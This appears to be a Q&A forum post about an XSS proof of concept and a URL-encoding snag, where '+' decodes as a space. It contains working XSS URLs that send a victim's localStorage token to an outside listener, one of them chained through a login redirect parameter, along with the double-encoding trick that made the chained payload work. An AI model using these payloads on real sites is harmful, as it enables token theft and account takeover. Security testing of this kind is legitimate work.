# + is decoded by the browser as space

Tags: xss, url, url-redirection, encoding

I am trying to poc and XSS in the url, and I have it working fine with the below url:

```
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22token%22);%3C/script%3E
```

Now I wanted to go further with this poc, and craft a url that lets the end user access the login page and then gets redirected to the infected url, so I crafted the below url:

```
https://example:15000/login/?originUrl=https://example:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://10.36.57.10:8080/%253fc=%22+localStorage.getItem(%22token%22);%3C/script%3E&client_id=ui-client
```

When I hit this in the browser, and intercept the call through burp, the `+` before the `localstorage` is being decoded as space!
I also tried to encode the `+`, but it is still decoded as a white space.

Noting that the first link is working fine and the `+` is not decoded as white space, why am I getting this issue when I use the second link?

Comment: Using a URL decoder, it shows up as a space in **both** URLs. `foo+bar` decodes to `foo bar`. Try any URL decoder online. So, this doesn't appear to be a security matter, but a plain URL encoding matter.

Comment: @schroeder yes I know, and what I tried to do is encode the + into %2b, but that didn't work.
So what I did is trying to encode the % before the 2b, so % will be %25, concatinated with 2b, so the final encoded value will be %252b, and that worked fine for me :D

Comment: This worked to me now just after I posted the quesion :D

Comment: @schroeder can we move the question to stackoverflow? since I already found a solution and may be helpful for others, WDYT?

Comment: You will need to adjust some facts and have a programming-based question. As I said, **both** URLs have the space. And you ask why `+` is interpreted as a space, and that's because it *is* a space. If you reframe to "how to avoid getting interpreted as a space" it might fit there,